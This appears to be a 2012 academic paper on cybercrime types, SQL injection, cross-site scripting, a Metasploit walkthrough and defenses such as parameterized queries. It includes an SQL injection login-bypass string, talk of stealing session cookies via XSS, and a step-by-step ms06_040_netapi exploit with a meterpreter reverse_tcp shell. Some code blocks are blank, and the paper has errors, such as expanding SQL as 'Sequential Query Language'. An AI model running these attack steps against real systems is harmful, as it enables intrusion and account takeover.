CYBERCRIMES, ATTACKS, VULNERABILITIES AND SECURITY

JOSHI R.N.¹, DALVI R.M.^2
1Shri Ramdeo Baba College of Engineering and Management. (An Autonomous College of Rashtrasant Tukadoji Maharaj Nagpur University)
²Shri Ramdeo Baba College of Engineering and Management. (An Autonomous College of Rashtrasant Tukadoji Maharaj Nagpur University)

Received : 15-03-2012     Accepted : 12-04-2012     Published : 20-12-2012
Volume : 2     Issue : 2       Pages : 58 - 65
Bioinfo Secur Inform 2.2 (2012):58-65

Introduction- Cybercrime is becoming ever more serious. In this paper, we define different types of cybercrime and we will also learn how security can be practised thorough different very powerful new techniques. We will also see only some of the vulnerabilities which lead pranksters to attack on the system. We focus on learning techniques through powerful examples. We will provide some snapshots also where ever necessary. Cybercrime is a relatively new phenomenon. Most of the business firms maintain WWW sites and over half of them conduct electronic commerce on the Internet. The rise in popularity of the Internet for both private persons and businesses has resulted in a corresponding rise in the number of Internet-related crimes. Cybercrime Crimes- Perhaps the most prominent form of cybercrime is identity theft, in which criminals use the Internet to steal personal information from other users. One of the most common ways this is done is through phishing. It has been seen that blackmail and terrorism often employ identity theft. It is smart to always check the URL or Web address of a site to make sure it is legitimate before entering your personal information. We will see here different cyber crimes and their examples. Cyber Security- Cyber security standards have been created recently because sensitive information is now frequently stored on computers that are attached to the internet. These computers are more prone to attacks if a even a small vulnerability is left in them. Cyber security is important to individuals because they need to guard against identity theft. Businesses also have a need for this security because they need to protect their trade secrets, proprietary information, and customer’s personal information, business bets and all. The government also has the need to secure their information. This is particularly critical since some terrorism acts are organized and facilitated by using the internet. We will see how to use a certain operating system for security purposes and we will learn this in detail. We will see some code snippets and even watch their snapshots when I performed them on my computer. We will learn how to tackle the OASP TOP 2 vulnerabilities not only through theory but with rigid code samples given for every place where possible. Conclusion- Obviously it is not possible to eliminate the Cybercrime threat from their root. But at the end of the paper we guaranty that one will definitely try and increase the data they are entering at important places. As they now what exactly is phishing and how their session ID can be grabbed through XSS. Thus we have tried our best here to increase our knowledge towards some very common but unattended matters. And after doing this entire if you are attacked still! No worries, there is law to help you ultimately and stand by your side. We would definitely like to make it clear here that everything we will be discussing from here on is for SECURITY purposes. However, because it can be seen the other way also lets not make any mistakes in the message we want to deliver. Just like weapon, they are manufactured under the tag of self defence but we all know what exact purpose they fulfil, don’t we? So let’s begin here, shall we?

Cybercrime refers to any crime that involves a computer and a network. Cybercrime is a general term which includes crimes like credit card frauds, bank robbery, illegal downloading, industrial espionage, scams, cyber terrorism, creation and distribution of viruses, Spam and so on. All such crimes are computer related and facilitated crimes.
With the evolution of the Internet, along came another revolution of crime where the perpetrators commit acts of crime and wrong doing on the World Wide Web. Internet crime takes many faces and is committed in diverse fashions. The number of users and their diversity in their makeup has exposed the Internet to everyone. Some criminals in the Internet have grown up understanding this super highway of information, unlike the older generation of users. This is why Internet crime has now become a growing problem in the whole world. Some crimes committed on the Internet have been exposed to the world and some remain a mystery up until they are perpetrated against someone or some company.
The characterization of hackers in the media has ranged from the high-tech super-spy to the lonely anti-social teen who is simply looking for entertainment. The reality, however, is that hackers are a very diverse bunch, a group simultaneously blamed with causing billions of dollars in damages as well as credited with the development of the World Wide Web and the founding of major tech companies. There exists two kinds of groups when we talk about hackers, Black Hat Hackers and White Hat Hackers.

The Internet abounds with hackers, known as crackers or "black hats," who work to exploit computer systems. They are the ones you've seen on the news being hauled away for cybercrimes. Some of them do it for fun and curiosity, while others are looking for personal gain.

Hackers that use their skills for good are classified as "white hat." These white hats often work as certified "Ethical Hackers," hired by companies to test the integrity of their systems. Others operate without company permission by bending but not breaking laws.

The act of defeating the security capabilities of a computer system in order to obtain an illegal access to the information stored on the computer system is called hacking. Another highly dangerous computer crime is the hacking of IP addresses in order to transact
with a false identity, thus remaining anonymous while carrying out the criminal activities.
Example: Vladimir Levin is famous because he allegedly masterminded the Russian hacker gang that tricked Citibank's computers Into spitting out $10 million. He was sentenced to three years in prison and ordered to pay Citibank $240,015. Citibank has since begun using the Dynamic Encryption Card, a security system so tight that no other financial institution in the world has it .

Phishing is the act of attempting to acquire sensitive information like usernames, passwords and credit card details by disguising as a trustworthy source. Phishing is carried out through emails or by luring the users to enter personal information through fake websites. Criminals often use websites that have a look and feel of some popular website, which makes the users feel safe to enter their details there.

These are actually computer programs that are capable of replicating themselves and harming computer systems. These viruses work without the knowledge of the users and spread from one computer to another through the network, Internet or removable devices like CDs and USB drives. Writing computer virus is a criminal activity and is punishable by law. The fastest spreading virus in history appears to have been written by a resident of Manila in the Philippines. Sent via e-mail in May 2000 with "I LOVE YOU" in the subject field, it replicated itself to everyone in the user's Outlook address book and then destroyed local files.

This is one of the most serious frauds in today's word. It involves stealing money and getting benefits by using an identity of another person. This also includes the use of someone else's credit card details to purchase goods and services. It has been seen that blackmail and terrorism often employ identity theft.
Example: Albert Gonzalez of Miami, is charged with acting with two unnamed conspirators to locate large corporations and steal vital account information in a crime that the Department of Justice calls "the single largest hacking and identity theft case ever prosecuted. “Authorities say more than 130 million credit and debit card numbers were stolen in a corporate data breach involving three different corporations and two individuals.

This is done using the Internet to stalk a person just like someone would do in the real world. Here the stalker sends emails, spreads false information or issues threats using the Internet. Cyber stalkers often target the users by means of chat rooms, online forums and social networking websites to gather user information and harass the users on the basis of the information gathered.

We should first understand, the path of the data that travels from the moment it leaves our computer. Usually the transactions over internet are queries and their replies from the respective websites. Now what exactly happens when the data leaves our computer is that it travels over the internet and ultimately lands in the website application. Here it is classified as a SQL database query and interpreted through the Web Server. Now it’s a common practise even today to use database to store all the user information of a website and the common language that we use to establish connection with this database is SQL (Sequential Query Language).
We will understand first how these queries work and where exactly use of SQL will pose a vulnerability. The data supplies by the user is the fragment of SQL query which together with the code written by the application developers forms a complete commands which obtains the desired data from database. Now this command is forwarded to database where it interprets it. This is where the problem occurs. This is the vulnerable place in coding of application.
Let’s understand this all with a simple example:
SQL query:
Private void SampleQuery(User_Info_String){
String sql= “select * from users where name ‘ ”+ User_Info_String + ” ’ “;
Perform (sql);
}
Explanation: Let’s suppose user enters some “jack” as User_Info_String, then string sql has the database command. It’s fired on the database server interpreted there and the column corresponding to jack field is retrieved from database and forwarded to the user. In this way, the application works properly but let’s now sees how it can be subjected to Injection which drains vulnerable information from database.
Consider a database containing table ‘member’ which contains information of all the user_id and password of a prestigious website.
SQL Query:
Private void SampleQuery(user_id, pwd){
String sql= “select * from members where userID= user_id Password= pwd“;
executeQuery (sql);
}
Explanation: Above SQL query is very simple it accepts user name and passwords and retrieves user information. But some intelligent user fires “select * from member where userID=admin Password= '0'or'0'='0' ”. Let’s understand what happens now, the above query will be interpreted correct and the “Intelligent User ” login as admin! Boom Hacked!
Thus one small flow in coding and we can lose all our data to external penetration. This is mainly not desirable in corporate world and banking sectors.

In this data is extracted using same channel through which SQL code is injected. These are most straightforward queries. In this method the database itself helps the hacker or unauthorised person in some extent. In this the syntax errors of some queries are used for extraction of data. The user will fire certain queries which have error in their syntax and in response the database will fire the row of column as help or response to the error in query. The smartest example can be fire a query which tells the database interpreter to accept a userID String and convert it into integer value. Obviously the query is wrong and response from the interpreter can be “THIS cant be converted into integer” where THIS may stand very vulnerable information related to userID such as password! Boom Hacked. Query can be as follows
SQL [site] php?id=1 or convert{int(nick)};

In this, data is actually extracted through another channel medium. This type of injection attack over database actually contains some SQL query and such mail embedded with certain vulnerable query is forwarded to tester. This taster is some another channel for e.g. some DNS server or HTTP. Thus by using a bypass we can again extract data from desired server.

When the SQL server does not return the error report then we need to infer from the available data and use reverse engineering to get the desired result this technique is known as Inferential.

XSS AKA cross site scripting is another attack on web security using the vulnerability in code. The main difference between Injection attacks and scripting attacks is the target of attack. In injection attacks the intelligent user attacks a database server, where as in scripting attacks the destination is other “User” itself. And here, by other user we definitely aren’t going to attack other user physically but, yes, we will be attacking his web browser. In injection attacks user writes some intelligent query and database server after interpreting it returns unauthorized information back to the user but here the intelligent user writes more than a query and that query or from now onwards let’s use a more legitimate word the “Script” runs quietly in the web browser in the background and Boom Hacked! No matter the website seems to work properly but you never know what has attacked you in the slightest.
As the injection attacks are written in SQL these scripting attacks are written in JAVASCRIPT. Actually the cross site scripting attack is another kind of injection “Script Injection”. The victim’s web browser is used to distribute malicious scripts here.

Always, thing get a little clearer when we are bombarded with some example. So let’s understand this scripting thing with an example. Let’s suppose there is common discussion forum on some prestigious website where millions of users see every day what’s going on the forum. What exactly happens when someone posts a thread there, is it first goes in the website database, there it is stored and for the next users showed as legitimate contents.
Let’s suppose a prankster decides to play with the forum website. Then he posts more than a thread on the forum a small part of working malicious script programme. After all the basic processes, every time a user views the posts, a dynamic web page is created. It consists of static contents and dynamic contents usually. Static contents are the contents which remain same for considerable period of time and dynamic contents are those which keep on changing over period of time. Consider a javascript posted by a prankster.

HEADING 1

HEADING 2

When he hits submit, then the contents are carried towards the database server where the static and dynamic contents are mixed together and user see a web page as the legitimate contents. This script contains either code of malicious activity or link of some external javascript code. Now the visitors to this website will see the webpage without any visual indication of getting malicious activity triggered. But without them knowing Boom Hacked!
A common question may arise as to what exactly the prankster do even after he installs his javascript in victims web browser. Well, well, well its like getting control of his whole session. The most hardcore attack through javascript is envisaged upon the “Session ID” which is stored in ‘document cookie’. It’s popularly known “Stealing Session ID”. Thus way you can get hold of victim’s whole session without you required to log in. Another possible attack can be imagined, it uses a property of javascript which now will be vulnerability that it can be used to modify the code of the ‘Web Page’! Imagine how cool this sounds! Thus way you can just rewrite the code of the login window of any site and when the victim enters the credentials; your code will bring all those to your web browser without you having to do any stupid stuff and without victim knowing a dime what’s going on behind his browser’s back.
But its not the case that only attackers are smart, some smart users are there who may ask Cant we just block the Script tag and conquer the threat of XSS? Well, firstly, yeah that’s intelligent and secondly, “No., that’s of no use”. Cause these hackers or cyber attackers are always two steps ahead of us. The scripting can be done without using script tag!
Again let’s do this with an example:
Consider some website has a search box, now the vulnerability here is that in most of the cases these boxes are EXECUTABLE! So if you copied followed query in the search box
CODE:

a pop box alerts with the above tab name! So what we can do is insert certain legitimate query and get the contents! For ex:
CODE:

Thus the new code snippet will generate a new event handler and Boom Hacked that too without having to explicitly use the script tag!

The thing which we need to understand first is that cyber attacks don’t always mean attacking remote websites and getting unauthorised information from database by hook or crook. Another type of attack is when some prankster decides to attack some remote ‘desktop’ machine! Yeah! That is also possible. And actually this is the most vulnerable place where hackers find it very easy to penetrate into someone’s machine. Her penetration testing comes very handy.
It’s a practise of checking the security of a remote computer or network by ‘Simulating’ an attack either from outsider who possess no authorisation to access any data or from some malicious insider who possess some rights to access data. This security technique is most beneficial when we deal with some serious attacks on data such as in business firms and banking sectors. Here we can’t afford to lose data from any remote computer’s data. Some of the very important profits can be.
1. Getting vulnerability information
2. Deciding the importance of vulnerable parameters.
3. Getting the information of where exactly is system weak to oppose external penetration.
4. Accessing magnitude of potential threats
5. To give proof for increase in the investment for security aspects.
There are different methodologies available for this ‘noble’ cause. Actually normal people or developers don’t how vast this branch of security has gone! Some methodologies rather terms we explain first here.
• Black Box Testing- This assumes no prior knowledge of victim network. This type of testing is hardest because we need to ‘gather information’ first such as network maps, packet paths, source codes and the most important thing the ‘IP configuration system’. If someone gets his hands on Ip configuration then it becomes a daunting task to prevent potential threats.
• White Box Testing- Obviously this is the security testing where we know almost all the minute details of network topology, protocols, diagrams and IP configuration system. This is useful when we need to make our own system stronger and to find possible vulnerability.
• Gray Box Testing- In the same way as black and white this is the testing with partial knowledge of network.
Now, in order to use all the methodologies and all one great computer geek HD Moore created a frame work Metasploit to test security of random computers through penetration.
but before that lets get some knowledge about a certain Operating System which is only and originally designed for hacking purposes and which can be easily used for security purposes, the ‘BackTrack’.

This is the heaven for a person who wants to secure computer against external penetration. The most powerful security tools are here ready for serving our cause. The Metasploit framework, RFMON, wireshark these are some of the famous ’security’ tools which are already there in the BackTrack OS. Even for the daunting task of information gathering we have tools in BackTrack. Also, for port scanning, password cracking, keylogging and even injecting techniques we have tools here. Even some of the exploitation tools are here already present in the form of ‘tool’. But beware this can be used against its original purpose. It’s just like manufacturing weapon for your safety but that weapon can as well be used for destruction also which totally voids its original purpose.

Now let’s come to what we are going to learn in this paper the ‘Metasploit Framework’. It’s a computer security project. Before getting knowledge of this awesome framework lets clearer some terminologies first,
• Exploit- The chunk of code, piece of software or sequence of commands which results in some extraction of unauthorised data. These things make use of vulnerabilities found in the design or application code.
• Payloads- This is that part of the transmitted data which itself is the cause of transmission of data. And in computer security a payload is the computer virus that performs malicious activity.
Now I consider the recipient of this paper will be computer literate crowd so instead of going in the very small details of every term I would very much like to explain one payload ’Meterpreter’ with all its commands and results. Meterpreter is a payload which enables us to control victims screen! So let’s dive into some real security stuff, shall we? Here is general skeleton of what we need to do to in BackTrack to test any payload.
CODE
root@bt# msfconsole # This brings a metasploit console in BackTrack OS
msf>search smb or netapi or icecast # This selects any network on which our victim may be present on
msf>use exploit/windows/smb/ms06_040_netapi # In here we type the name of the exploit we want to test. Let’s suppose we are searching the victim ‘netapi’ server, so at this point we are at following directory
msf exploit(ms06_040_netapi )> show options # This command shows all the options available for changing the options of ip or anything like that.
msf exploit(ms06_040_netapi )>set RHOST # here we set ip of victim. If victim is not known, it can be obtained in the following manner.
1) Open Command prompt
2) type ipconfig press enter
msf exploit (ms06_040_netapi )> show payloads #It shows all the payloads that can be used with this exploit.

out of all the payloads available we need to select the following payload
windows/meterpretoe/reverse_tcp
The trick here is that when we exploit the victim, instead of us connecting to that system to run the ‘meterpreter’ shell, the above payload helps the victim itself connect to our system. This helps to get pass all the firewalls and any other small barriers if any.
msf expliot(ms06_040_netapi )> set PAYLOAD windows/meterpreter/reverse_tcp
This sets the desired payload.
msf exploit(ms06_040_netapi )> show options #This time to change the LHOST ip.
msf exploit(ms06_040_netapi )>set LHOST
to get your own ip. Follow the following sequence.
1) Open a new terminal in BackTrack
2) type ifconfig
msf exploit(ms06_040_netapi )>Exploit #This command will exploit the victim machine.
The above code sequence or command bunch will open a meterpreter command shell open and you can do a bunch of stuff here with different more commands.
This is actually just a skeleton to use any other exploit. Now if remote computer responses to such exploit it need to be taken care of. Thus we use penetration techniques for security purposes.

1) Parameterized Queries
Use of parameterized queries is the best solution for conquering SQL injection attack. Let’s just check this with an example without diving into all the theory stuff.
Code JAVA
String sql = “select * from users where use_id= ?”;
preparedStatement pstmt = connection.preparedStatement(sql);
pstmt.setString( 1, cust_ID);
ResultSet rslt = pstmt.executeQuery(sql);
Explaination
instead of statement we use here a prepared statement which allows us to replace the ‘?’ with user obtained data. In the same manner we have parameterised queries in .NET and any other platform.
This is the best possible bet to tackle SQL injection attacks.
2) Use Of Stored Procedures
This is notebook method for tackling the injections attack. We just need to follow some follow some security best practises before using them.
3) Other interpreters
When it comes to other interpreters other than database like LDAP, XSLT, XPATH they don’t support parameterised queries so we need to ENCODE the user data.
# Inside an HTML comment